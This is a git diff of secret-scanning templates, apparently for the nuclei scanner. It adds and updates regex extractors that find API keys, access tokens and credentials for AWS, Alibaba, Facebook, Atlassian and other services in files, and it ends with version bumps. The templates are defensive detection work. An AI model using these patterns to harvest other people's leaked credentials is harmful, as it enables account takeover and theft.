- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.yaml
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.go
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: adobe,file,token
|
||||||
|
|
||||||
|
file:
|
||||||
|
- extensions:
|
||||||
|
- all
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- (?i)(?:adobe)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: airtable-key
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Airtable API Key
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.yaml
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.go
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: airtable,file,token
|
||||||
|
|
||||||
|
file:
|
||||||
|
- extensions:
|
||||||
|
- all
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- (?i)(?:airtable)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{17})(?:['|\"|\n|\r|\s|\x60|;]|$)
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: algolia-key
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Algolia API Key
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.yaml
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.go
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: algolia,file,keys
|
||||||
|
|
||||||
|
file:
|
||||||
|
- extensions:
|
||||||
|
- all
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- (?i)(?:algolia)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: alibaba-key-id
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Alibaba Access Key ID
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.yaml
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.go
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: alibaba,access,file,keys
|
||||||
|
|
||||||
|
file:
|
||||||
|
- extensions:
|
||||||
|
- all
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- (?i)\b((LTAI)(?i)[a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$)
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: alibaba-secret-id
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Alibaba Secret Key ID
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.yaml
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.go
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: alibaba,secret,file,keys
|
||||||
|
|
||||||
|
file:
|
||||||
|
- extensions:
|
||||||
|
- all
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- (?i)(?:alibaba)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{30})(?:['|\"|\n|\r|\s|\x60|;]|$)
|
|
@ -1,11 +1,16 @@
|
||||||
id: amazon-account-id
|
id: amazon-account-id
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: AWS Account ID
|
name: Amazon Web Services Account ID - Detect
|
||||||
author: DhiyaneshDK
|
author: DhiyaneshDK
|
||||||
severity: info
|
severity: info
|
||||||
|
description: Amazon Web Services Account ID token was detected.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml
|
- https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
tags: aws,amazon,token,file
|
tags: aws,amazon,token,file
|
||||||
|
@ -19,3 +24,5 @@ file:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)aws_?(?:account)_?(?:id)?["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([0-9]{4}-?[0-9]{4}-?[0-9]{4})'
|
- '(?i)aws_?(?:account)_?(?:id)?["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([0-9]{4}-?[0-9]{4}-?[0-9]{4})'
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: amazon-mws-auth-token-value
|
id: amazon-mws-auth-token-value
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Amazon MWS Auth Token
|
name: Amazon MWS Authentication Token - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: medium
|
severity: medium
|
||||||
|
description: Amazon MWS authentication token was detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.3
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: token,file,amazon,auth
|
tags: token,file,amazon,auth
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -14,3 +19,5 @@ file:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
|
- "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,11 +1,16 @@
|
||||||
id: amazon-session-token
|
id: amazon-session-token
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Amazon Session Token
|
name: Amazon Session Token - Detect
|
||||||
author: DhiyaneshDK
|
author: DhiyaneshDK
|
||||||
severity: info
|
severity: info
|
||||||
|
description: Amazon session token was detected.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml
|
- https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
tags: aws,amazon,token,file,session
|
tags: aws,amazon,token,file,session
|
||||||
|
@ -19,3 +24,5 @@ file:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)(?:aws.?session|aws.?session.?token|aws.?token)["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([a-z0-9/+=]{16,200})[^a-z0-9/+=]'
|
- '(?i)(?:aws.?session|aws.?session.?token|aws.?token)["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([a-z0-9/+=]{16,200})[^a-z0-9/+=]'
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: amazon-sns-token
|
id: amazon-sns-token
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Amazon SNS Token Detect
|
name: Amazon SNS Token - Detect
|
||||||
author: TheBinitGhimire
|
author: TheBinitGhimire
|
||||||
severity: info
|
severity: info
|
||||||
|
description: Amazon SNS token was detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: file,token,amazon,aws
|
tags: file,token,amazon,aws
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -15,3 +20,5 @@ file:
|
||||||
name: amazon-sns-topic
|
name: amazon-sns-topic
|
||||||
regex:
|
regex:
|
||||||
- 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+'
|
- 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+'
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: aws-access-key
|
id: aws-access-key
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: AWS Access Key ID
|
name: Amazon Web Services Access Key ID - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: info
|
severity: info
|
||||||
|
description: Amazon Web Services Access Key ID token was detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: token,file
|
tags: token,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -14,3 +19,5 @@ file:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
|
- "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: aws-cognito-pool
|
id: aws-cognito-pool
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: AWS Cognito Pool ID
|
name: Amazon Web Services Cognito Pool ID - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: info
|
severity: info
|
||||||
|
description: Amazon Web Services Cognito Pool ID token was detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: token,file
|
tags: token,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -30,3 +35,5 @@ file:
|
||||||
- "us-west-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}"
|
- "us-west-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}"
|
||||||
- "us-west-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}"
|
- "us-west-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}"
|
||||||
- "sa-east-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}"
|
- "sa-east-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: asana-clientid
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Asana Client ID
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.go
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.yaml
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: asana,client,file,keys
|
||||||
|
|
||||||
|
file:
|
||||||
|
- extensions:
|
||||||
|
- all
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$)
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: asana-clientsecret
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Asana Client Secret
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-secret.go
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-secret.yaml
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: asana,client,file,keys,secret
|
||||||
|
|
||||||
|
file:
|
||||||
|
- extensions:
|
||||||
|
- all
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: atlassian-api-token
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Atlassian API Token
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.go
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.yaml
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: atlassian,file,token,api
|
||||||
|
|
||||||
|
file:
|
||||||
|
- extensions:
|
||||||
|
- all
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- (?i)(?:atlassian|confluence|jira)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$)
|
|
@ -1,11 +1,16 @@
|
||||||
id: branch-key
|
id: branch-key
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Branch.io Live Key
|
name: Branch.io Live Key - Detect
|
||||||
author: 0xh7ml
|
author: 0xh7ml
|
||||||
severity: info
|
severity: info
|
||||||
|
description: Branch.io live key token was detected.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74
|
- https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: token,file
|
tags: token,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -16,3 +21,5 @@ file:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "key_live_.{32}"
|
- "key_live_.{32}"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: cloudinary-basic-auth
|
id: cloudinary-basic-auth
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Cloudinary Basic Auth
|
name: Cloudinary Basic Authorization - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: high
|
severity: high
|
||||||
|
description: Cloudinary basic authorization token was detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: token,file,cloudinary
|
tags: token,file,cloudinary
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -14,3 +19,5 @@ file:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+"
|
- "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,12 +1,17 @@
|
||||||
id: code-climate-token
|
id: code-climate-token
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Code Climate Token
|
name: Code Climate Token - Detect
|
||||||
author: DhiyaneshDK
|
author: DhiyaneshDK
|
||||||
severity: info
|
severity: info
|
||||||
|
description: Code Climate token was detected.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/codeclimate.yml
|
- https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/codeclimate.yml
|
||||||
- https://github.com/codeclimate/ruby-test-reporter/issues/34
|
- https://github.com/codeclimate/ruby-test-reporter/issues/34
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
tags: codeclimate,token,file
|
tags: codeclimate,token,file
|
||||||
|
@ -20,3 +25,5 @@ file:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)codeclima.{0,50}\b([a-f0-9]{64})\b'
|
- '(?i)codeclima.{0,50}\b([a-f0-9]{64})\b'
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,13 +1,18 @@
|
||||||
id: cratesio-api-key
|
id: cratesio-api-key
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Crates.io API Key
|
name: Crates.io API Key - Detect
|
||||||
author: DhiyaneshDK
|
author: DhiyaneshDK
|
||||||
severity: info
|
severity: info
|
||||||
|
description: Crates.io API key was detected.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/crates.io.yml
|
- https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/crates.io.yml
|
||||||
- https://crates.io/data-access
|
- https://crates.io/data-access
|
||||||
- https://github.com/rust-lang/crates.io/blob/master/src/util/token.rs
|
- https://github.com/rust-lang/crates.io/blob/master/src/util/token.rs
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
tags: crates,token,file
|
tags: crates,token,file
|
||||||
|
@ -21,3 +26,5 @@ file:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '\bcio[a-zA-Z0-9]{32}\b'
|
- '\bcio[a-zA-Z0-9]{32}\b'
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,6 +1,13 @@
|
||||||
id: credentials-disclosure-file
|
id: credentials-disclosure-file
|
||||||
|
|
||||||
# Extract secrets regex like api keys, password, token, etc ... for different services
|
info:
|
||||||
|
name: Credentials Disclosure Check
|
||||||
|
author: Sy3Omda,geeknik,forgedhallpass,ayadi
|
||||||
|
severity: unknown
|
||||||
|
description: Check for multiple keys/tokens/passwords hidden inside of files.
|
||||||
|
tags: exposure,token,file,disclosure
|
||||||
|
|
||||||
|
# Extract secrets regex like api keys, password, token, etc ... for different services.
|
||||||
# Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue.
|
# Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue.
|
||||||
# Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes.
|
# Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes.
|
||||||
# Regex count:- 687
|
# Regex count:- 687
|
||||||
|
@ -9,14 +16,6 @@ id: credentials-disclosure-file
|
||||||
# This template requires manual inspection once found valid match.
|
# This template requires manual inspection once found valid match.
|
||||||
# Generic token could be anything matching below regex.
|
# Generic token could be anything matching below regex.
|
||||||
# Impact of leaked token depends on validation of leaked token.
|
# Impact of leaked token depends on validation of leaked token.
|
||||||
|
|
||||||
info:
|
|
||||||
name: Credentials Disclosure Check
|
|
||||||
author: Sy3Omda,geeknik,forgedhallpass,ayadi
|
|
||||||
severity: unknown
|
|
||||||
description: Look for multiple keys/tokens/passwords hidden inside of files.
|
|
||||||
tags: exposure,token,file,disclosure
|
|
||||||
|
|
||||||
# The regexes are copied from exposures/tokens/generic/credentials-disclosure.yaml
|
# The regexes are copied from exposures/tokens/generic/credentials-disclosure.yaml
|
||||||
# TODO After https://github.com/projectdiscovery/nuclei/issues/1510 is implemented, we should be able to re-use them, instead of duplicating
|
# TODO After https://github.com/projectdiscovery/nuclei/issues/1510 is implemented, we should be able to re-use them, instead of duplicating
|
||||||
# Example cases to match against: https://regex101.com/r/HPtaU2/1
|
# Example cases to match against: https://regex101.com/r/HPtaU2/1
|
||||||
|
@ -719,3 +718,5 @@ file:
|
||||||
- "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
|
- "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
|
||||||
- "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
|
- "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
|
||||||
- "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+"
|
- "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: basic-auth-creds
|
id: basic-auth-creds
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Basic Auth Credentials
|
name: Basic Authorization Credentials Check
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: high
|
severity: high
|
||||||
|
description: Basic authorization credentials check was conducted.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: token,file,auth
|
tags: token,file,auth
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -14,3 +19,5 @@ file:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]"
|
- "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: dynatrace-token
|
id: dynatrace-token
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Dynatrace Token
|
name: Dynatrace Token - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: high
|
severity: high
|
||||||
|
description: Dynatrace token was detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: token,file
|
tags: token,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -14,3 +19,5 @@ file:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}"
|
- "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,9 +1,14 @@
|
||||||
id: facebook-client-id
|
id: facebook-client-id
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Facebook Client ID
|
name: Facebook Client ID - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: info
|
severity: info
|
||||||
|
description: Facebook client ID token was detected.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: token,file,facebook
|
tags: token,file,facebook
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -14,3 +19,5 @@ file:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "(?i)(facebook|fb)(.{0,20})?['\"][0-9]{13,17}['\"]"
|
- "(?i)(facebook|fb)(.{0,20})?['\"][0-9]{13,17}['\"]"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,9 +1,10 @@
|
||||||
id: facebook-secret-key
|
id: facebook-secret-key
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Facebook Secret Key
|
name: Facebook Secret Key - Detect
|
||||||
author: gaurang
|
author: gaurang
|
||||||
severity: low
|
severity: low
|
||||||
|
description: Facebook secret key token was detected.
|
||||||
tags: token,file,facebook
|
tags: token,file,facebook
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -14,3 +15,5 @@ file:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "(?i)(facebook|fb)(.{0,20})?(?-i)['\"][0-9a-f]{32}['\"]"
|
- "(?i)(facebook|fb)(.{0,20})?(?-i)['\"][0-9a-f]{32}['\"]"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
4.4.0.1
|
4.4.1
|
|
@ -1 +1 @@
|
||||||
2.0.26
|
2.0.27
|
|
@ -1 +1 @@
|
||||||
3.4.1
|
3.4.2
|
|
@ -1 +1 @@
|
||||||
5.8.0
|
5.8.1
|
|
@ -1 +1 @@
|
||||||
3.0.26
|
3.0.27
|
|
@ -1 +1 @@
|
||||||
1.24.4
|
1.24.6
|
|
@ -1 +1 @@
|
||||||
12.2.1
|
12.3
|
|
@ -1 +1 @@
|
||||||
3.32.0
|
3.33.0
|
|
@ -1 +1 @@
|
||||||
3.36
|
3.37
|
|
@ -1 +1 @@
|
||||||
3.6.27
|
3.6.28
|
|
@ -1 +1 @@
|
||||||
9.3.9
|
9.4.0.1
|
|
@ -1 +1 @@
|
||||||
7.0.5
|
7.0.6
|
|
@ -1 +1 @@
|
||||||
2.1.4
|
2.1.5
|
|
@ -1 +1 @@
|
||||||
1.23.6
|
